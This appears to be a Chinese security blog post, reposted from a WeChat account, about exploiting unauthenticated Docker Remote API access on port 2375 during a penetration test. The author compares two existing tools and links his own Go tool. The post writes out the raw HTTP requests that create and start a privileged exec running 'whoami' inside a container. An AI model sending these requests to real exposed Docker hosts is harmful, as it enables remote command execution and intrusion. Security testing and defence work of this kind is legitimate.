DockerApi未授权利用工具使用感受以及开发手记(2375端口)

admin 2025年6月16日00:16:12评论26 views字数 1565阅读5分13秒阅读模式

由于微信公众号推送机制改变了,快来星标不再迷路,谢谢大家!

DockerApi未授权利用工具使用感受以及开发手记(2375端口)
在最近攻防打内网的时候,遇到一些docker未授权访问漏洞。需要截图统计数量和执行命令证明获取相关权限。为了方便截图使用,当时需要在客户电脑上进行操作,频繁上传工具很麻烦。直接网上找了两个现成的工具进行使用。在使用过程中都有点问题,所以用Go构造了一个类似的,下次会方便点。
首先直接内网一把梭哈,发现docker未授权访问漏洞。
xiaomi100 pro maxhttps://comm.pgpsec.cn/467.html
DockerApi未授权利用工具使用感受以及开发手记(2375端口)
使用工具进行利用尝试
DockerApiRCE:https://github.com/0xchang/DockerApiRCE
执行命令的时候无法执行,设置好代理想看下怎么回事,不知道啥原因也是抓不到包人,然后会卡住。
DockerApi未授权利用工具使用感受以及开发手记(2375端口)
DockerApi-Rce:https://github.com/G0mini/Jmc_Tools
在执行命令的时候会卡住不动,重新启动也是
DockerApi未授权利用工具使用感受以及开发手记(2375端口)
为了自己方便所以用go自己构造了一个,目前使用起来没有问题,兼容性也还不错。
DockerApiRce:https://comm.pgpsec.cn/2368.html
主要技术:Go的Fyne现代化的 UI 工具包进行实现,也是学习下Go的图形化编程。
DockerApi未授权利用工具使用感受以及开发手记(2375端口)
DockerApi未授权利用工具使用感受以及开发手记(2375端口)
主要方法(大师傅们也可以自己动手实现):
GET /containers/json HTTP/1.1Host111.x.x.x:2375User-Agent: Go-http-client/1.1Accept-Encoding: gzip, deflate, brConnection: keep-alive
POST /containers/c5cf74a95f6dcb0f91065679f003db8b0888fbb2a3265d3c07aefd538d4c45e6/exec HTTP/1.1Host: 11.x.x.x:2375User-Agent: Go-http-client/1.1Content-Length: 108Content-Type: application/jsonAccept-Encoding: gzip, deflate, brConnection: keep-alive{"AttachStderr":true,"AttachStdin":false,"AttachStdout":true,"Cmd":["whoami"],"Privileged":true,"Tty":false}
POST /exec/92839a23e062ba4f2f4b4ad7ad4625761bda6e832a7c4712234fc10e505ba355(响应ID)/exec HTTP/1.1Host: 11.x.x.x:2375User-Agent: Go-http-client/1.1Content-Length: 108Content-Type: application/jsonAccept-Encoding: gzip, deflate, brConnection: keep-alive{"Detach":false,"Tty":false}
鹏组安全社区站:您身边的安全专家-情报 | 攻防 | 渗透 | 线索 | 资源社区
DockerApi未授权利用工具使用感受以及开发手记(2375端口)
扫码关注
社区
鹏组安全社区:comm.pgpsec.cn
专注网络技术与骇客的一个综合性技术性交流与资源分享社区

DockerApi未授权利用工具使用感受以及开发手记(2375端口)

免责声明
由于传播、利用本公众号鹏组安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号鹏组安全及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
好文分享收藏赞一下最美点在看哦

原文始发于微信公众号(鹏组安全):DockerApi未授权利用工具使用感受以及开发手记(2375端口)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年6月16日00:16:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   DockerApi未授权利用工具使用感受以及开发手记(2375端口)https://cn-sec.com/archives/4168234.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息